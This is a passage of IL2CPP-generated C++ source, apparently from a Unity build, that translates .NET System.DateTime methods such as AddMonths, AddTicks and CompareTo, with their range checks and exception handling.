DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E_AdjustorThunk (RuntimeObject * __this, SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 ___context1, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E(_thisAdjusted, ___info0, ___context1, method); } // System.Int64 System.DateTime::get_InternalTicks() extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { uint64_t L_0 = __this->get_dateData_44(); return ((int64_t)((int64_t)L_0&(int64_t)((int64_t)4611686018427387903LL))); } } extern "C" int64_t DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469(_thisAdjusted, method); } // System.UInt64 System.DateTime::get_InternalKind() extern "C" IL2CPP_METHOD_ATTR uint64_t DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { uint64_t L_0 = __this->get_dateData_44(); return ((int64_t)((int64_t)L_0&(int64_t)((int64_t)-4611686018427387904LL))); } } extern "C" uint64_t DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42(_thisAdjusted, method); } // System.DateTime System.DateTime::Add(System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_Add_mA4F1A47C77858AC06AF07CCE9BDFF32F442B27DB (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___value0, const RuntimeMethod* method) { { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_0 = ___value0; int64_t L_1 = L_0.get__ticks_3(); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_2 = DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, L_1, /*hidden argument*/NULL); return L_2; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_Add_mA4F1A47C77858AC06AF07CCE9BDFF32F442B27DB_AdjustorThunk (RuntimeObject * __this, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_Add_mA4F1A47C77858AC06AF07CCE9BDFF32F442B27DB(_thisAdjusted, ___value0, method); } // System.DateTime System.DateTime::Add(System.Double,System.Int32) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, double ___value0, int32_t ___scale1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; Exception_t * __last_unhandled_exception = 0; NO_UNUSED_WARNING (__last_unhandled_exception); Exception_t * __exception_local = 0; NO_UNUSED_WARNING (__exception_local); int32_t __leave_target = -1; NO_UNUSED_WARNING (__leave_target); double G_B2_0 = 0.0; double G_B1_0 = 0.0; double G_B3_0 = 0.0; double G_B3_1 = 0.0; IL_0000: try { // begin try (depth: 1) { double L_0 = ___value0; int32_t L_1 = ___scale1; double L_2 = ___value0; G_B1_0 = ((double)il2cpp_codegen_multiply((double)L_0, (double)(((double)((double)L_1))))); if ((((double)L_2) >= ((double)(0.0)))) { G_B2_0 = ((double)il2cpp_codegen_multiply((double)L_0, (double)(((double)((double)L_1))))); goto IL_001b; } } IL_0010: { G_B3_0 = (-0.5); G_B3_1 = G_B1_0; goto IL_0024; } IL_001b: { G_B3_0 = (0.5); G_B3_1 = G_B2_0; } IL_0024: { if (((double)il2cpp_codegen_add((double)G_B3_1, (double)G_B3_0)) > (double)(std::numeric_limits<int64_t>::max())) IL2CPP_RAISE_MANAGED_EXCEPTION(il2cpp_codegen_get_overflow_exception(), NULL, NULL); V_0 = (((int64_t)((int64_t)((double)il2cpp_codegen_add((double)G_B3_1, (double)G_B3_0))))); goto IL_003f; } } // end try (depth: 1) catch(Il2CppExceptionWrapper& e) { __exception_local = (Exception_t *)e.ex; if(il2cpp_codegen_class_is_assignable_from (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var, il2cpp_codegen_object_class(e.ex))) goto CATCH_0029; throw e; } CATCH_0029: { // begin catch(System.OverflowException) String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral9214C9F24885BBE3A6652B2B74E1F31D7DD4ADF2, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_4 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_4, _stringLiteralF32B67C7E26342AF42EFABC674D441DCA0A281C5, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524_RuntimeMethod_var); } // end catch (depth: 1) IL_003f: { int64_t L_5 = V_0; if ((((int64_t)L_5) <= ((int64_t)((int64_t)-315537897600000LL)))) { goto IL_0057; } } { int64_t L_6 = V_0; if ((((int64_t)L_6) < ((int64_t)((int64_t)315537897600000LL)))) { goto IL_006c; } } IL_0057: { String_t* L_7 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral9214C9F24885BBE3A6652B2B74E1F31D7DD4ADF2, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_8 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_8, _stringLiteralF32B67C7E26342AF42EFABC674D441DCA0A281C5, L_7, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_8, NULL, DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524_RuntimeMethod_var); } IL_006c: { int64_t L_9 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_10 = DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, ((int64_t)il2cpp_codegen_multiply((int64_t)L_9, (int64_t)(((int64_t)((int64_t)((int32_t)10000)))))), /*hidden argument*/NULL); return L_10; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524_AdjustorThunk (RuntimeObject * __this, double ___value0, int32_t ___scale1, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524(_thisAdjusted, ___value0, ___scale1, method); } // System.DateTime System.DateTime::AddDays(System.Double) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddDays_mB11D2BB2D7DD6944D1071809574A951258F94D8E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, double ___value0, const RuntimeMethod* method) { { double L_0 = ___value0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_1 = DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, L_0, ((int32_t)86400000), /*hidden argument*/NULL); return L_1; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddDays_mB11D2BB2D7DD6944D1071809574A951258F94D8E_AdjustorThunk (RuntimeObject * __this, double ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_AddDays_mB11D2BB2D7DD6944D1071809574A951258F94D8E(_thisAdjusted, ___value0, method); } // System.DateTime System.DateTime::AddMilliseconds(System.Double) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddMilliseconds_mD93AB4338708397D6030FF082EBB3FC8C3E195F2 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, double ___value0, const RuntimeMethod* method) { { double L_0 = ___value0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_1 = DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, L_0, 1, /*hidden argument*/NULL); return L_1; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddMilliseconds_mD93AB4338708397D6030FF082EBB3FC8C3E195F2_AdjustorThunk (RuntimeObject * __this, double ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_AddMilliseconds_mD93AB4338708397D6030FF082EBB3FC8C3E195F2(_thisAdjusted, ___value0, method); } // System.DateTime System.DateTime::AddMonths(System.Int32) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___months0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; int32_t V_3 = 0; int32_t V_4 = 0; { int32_t L_0 = ___months0; if ((((int32_t)L_0) < ((int32_t)((int32_t)-120000)))) { goto IL_0010; } } { int32_t L_1 = ___months0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)120000)))) { goto IL_0025; } } IL_0010: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral0B5A448C29B008BE58461324EB08382F6A1DA419, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_3 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_3, _stringLiteralF1494311E45E6D88177EAF1A6727542529836CC8, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC_RuntimeMethod_var); } IL_0025: { int32_t L_4 = DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, 0, /*hidden argument*/NULL); V_0 = L_4; int32_t L_5 = DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, 2, /*hidden argument*/NULL); V_1 = L_5; int32_t L_6 = DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, 3, /*hidden argument*/NULL); V_2 = L_6; int32_t L_7 = V_1; int32_t L_8 = ___months0; V_3 = ((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_7, (int32_t)1)), (int32_t)L_8)); int32_t L_9 = V_3; if ((((int32_t)L_9) < ((int32_t)0))) { goto IL_0057; } } { int32_t L_10 = V_3; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)((int32_t)((int32_t)L_10%(int32_t)((int32_t)12))), (int32_t)1)); int32_t L_11 = V_0; int32_t L_12 = V_3; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_11, (int32_t)((int32_t)((int32_t)L_12/(int32_t)((int32_t)12))))); goto IL_006b; } IL_0057: { int32_t L_13 = V_3; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)((int32_t)12), (int32_t)((int32_t)((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_13, (int32_t)1))%(int32_t)((int32_t)12))))); int32_t L_14 = V_0; int32_t L_15 = V_3; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_14, (int32_t)((int32_t)((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_15, (int32_t)((int32_t)11)))/(int32_t)((int32_t)12))))); } IL_006b: { int32_t L_16 = V_0; if ((((int32_t)L_16) < ((int32_t)1))) { goto IL_0077; } } { int32_t L_17 = V_0; if ((((int32_t)L_17) <= ((int32_t)((int32_t)9999)))) { goto IL_008c; } } IL_0077: { String_t* L_18 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6CD6471277F304FD7D1ADCD50886324343DBE87F, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_19 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_19, _stringLiteralF1494311E45E6D88177EAF1A6727542529836CC8, L_18, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_19, NULL, DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC_RuntimeMethod_var); } IL_008c: { int32_t L_20 = V_0; int32_t L_21 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); int32_t L_22 = DateTime_DaysInMonth_mE979D12858E0D6CC14576D283B5AB66AA53B9F90(L_20, L_21, /*hidden argument*/NULL); V_4 = L_22; int32_t L_23 = V_2; int32_t L_24 = V_4; if ((((int32_t)L_23) <= ((int32_t)L_24))) { goto IL_009d; } } { int32_t L_25 = V_4; V_2 = L_25; } IL_009d: { int32_t L_26 = V_0; int32_t L_27 = V_1; int32_t L_28 = V_2; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); int64_t L_29 = DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64(L_26, L_27, L_28, /*hidden argument*/NULL); int64_t L_30 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); uint64_t L_31 = DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_32; memset(&L_32, 0, sizeof(L_32)); DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E((&L_32), ((int64_t)((int64_t)((int64_t)il2cpp_codegen_add((int64_t)L_29, (int64_t)((int64_t)((int64_t)L_30%(int64_t)((int64_t)864000000000LL)))))|(int64_t)L_31)), /*hidden argument*/NULL); return L_32; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC_AdjustorThunk (RuntimeObject * __this, int32_t ___months0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC(_thisAdjusted, ___months0, method); } // System.DateTime System.DateTime::AddSeconds(System.Double) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddSeconds_m36DC8835432569A70AC5120359527350DD65D6B2 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, double ___value0, const RuntimeMethod* method) { { double L_0 = ___value0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_1 = DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, L_0, ((int32_t)1000), /*hidden argument*/NULL); return L_1; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddSeconds_m36DC8835432569A70AC5120359527350DD65D6B2_AdjustorThunk (RuntimeObject * __this, double ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_AddSeconds_m36DC8835432569A70AC5120359527350DD65D6B2(_thisAdjusted, ___value0, method); } // System.DateTime System.DateTime::AddTicks(System.Int64) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); V_0 = L_0; int64_t L_1 = ___value0; int64_t L_2 = V_0; if ((((int64_t)L_1) > ((int64_t)((int64_t)il2cpp_codegen_subtract((int64_t)((int64_t)3155378975999999999LL), (int64_t)L_2))))) { goto IL_001c; } } { int64_t L_3 = ___value0; int64_t L_4 = V_0; if ((((int64_t)L_3) >= ((int64_t)((int64_t)il2cpp_codegen_subtract((int64_t)(((int64_t)((int64_t)0))), (int64_t)L_4))))) { goto IL_0031; } } IL_001c: { String_t* L_5 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6CD6471277F304FD7D1ADCD50886324343DBE87F, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_6 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_6, _stringLiteralF32B67C7E26342AF42EFABC674D441DCA0A281C5, L_5, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_6, NULL, DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5_RuntimeMethod_var); } IL_0031: { int64_t L_7 = V_0; int64_t L_8 = ___value0; uint64_t L_9 = DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_10; memset(&L_10, 0, sizeof(L_10)); DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E((&L_10), ((int64_t)((int64_t)((int64_t)il2cpp_codegen_add((int64_t)L_7, (int64_t)L_8))|(int64_t)L_9)), /*hidden argument*/NULL); return L_10; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5_AdjustorThunk (RuntimeObject * __this, int64_t ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5(_thisAdjusted, ___value0, method); } // System.DateTime System.DateTime::AddYears(System.Int32) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddYears_m4D66AFB61758D852CEEFE29D103C88106C6847A2 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_AddYears_m4D66AFB61758D852CEEFE29D103C88106C6847A2_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; if ((((int32_t)L_0) < ((int32_t)((int32_t)-10000)))) { goto IL_0010; } } { int32_t L_1 = ___value0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)10000)))) { goto IL_0025; } } IL_0010: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralBA5566E02CA7D0FF07946B5BE9A254A7BA000156, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_3 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_3, _stringLiteralE21EE77D500910A11959B5AF57FD48D7CF7F326A, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, DateTime_AddYears_m4D66AFB61758D852CEEFE29D103C88106C6847A2_RuntimeMethod_var); } IL_0025: { int32_t L_4 = ___value0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_5 = DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, ((int32_t)il2cpp_codegen_multiply((int32_t)L_4, (int32_t)((int32_t)12))), /*hidden argument*/NULL); return L_5; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddYears_m4D66AFB61758D852CEEFE29D103C88106C6847A2_AdjustorThunk (RuntimeObject * __this, int32_t ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_AddYears_m4D66AFB61758D852CEEFE29D103C88106C6847A2(_thisAdjusted, ___value0, method); } // System.Int32 System.DateTime::CompareTo(System.Object) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_CompareTo_mC233DDAE807A48EE6895CC09CE22E111E506D08C (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject * ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_CompareTo_mC233DDAE807A48EE6895CC09CE22E111E506D08C_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; int64_t V_1 = 0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 V_2; memset(&V_2, 0, sizeof(V_2)); { RuntimeObject * L_0 = ___value0; if (L_0) { goto IL_0005; } } { return 1; } IL_0005: { RuntimeObject * L_1 = ___value0; if (((RuntimeObject *)IsInstSealed((RuntimeObject*)L_1, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))) { goto IL_001d; } } { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral0EEEC4869A9E258F65B3250DEAFDD0D174088EE5, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_3 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m9A85EF7FEFEC21DDD525A67E831D77278E5165B7(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, DateTime_CompareTo_mC233DDAE807A48EE6895CC09CE22E111E506D08C_RuntimeMethod_var); } IL_001d: { RuntimeObject * L_4 = ___value0; V_2 = ((*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)UnBox(L_4, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var)))); int64_t L_5 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_2), /*hidden argument*/NULL); V_0 = L_5; int64_t L_6 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); V_1 = L_6; int64_t L_7 = V_1; int64_t L_8 = V_0; if ((((int64_t)L_7) <= ((int64_t)L_8))) { goto IL_0039; } } { return 1; } IL_0039: { int64_t L_9 = V_1; int64_t L_10 = V_0; if ((((int64_t)L_9) >= ((int64_t)L_10))) { goto IL_003f; } } { return (-1); } IL_003f: { return 0; } } extern "C" int32_t DateTime_CompareTo_mC233DDAE807A48EE6895CC09CE22E111E506D08C_AdjustorThunk (RuntimeObject * __this, RuntimeObject * ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_CompareTo_mC233DDAE807A48EE6895CC09CE22E111E506D08C(_thisAdjusted, ___value0, method); } // System.Int32 System.DateTime::CompareTo(System.DateTime) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_CompareTo_mB538B6524ED249F1A5ED43E00D61F7D9EB3DAD6E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, 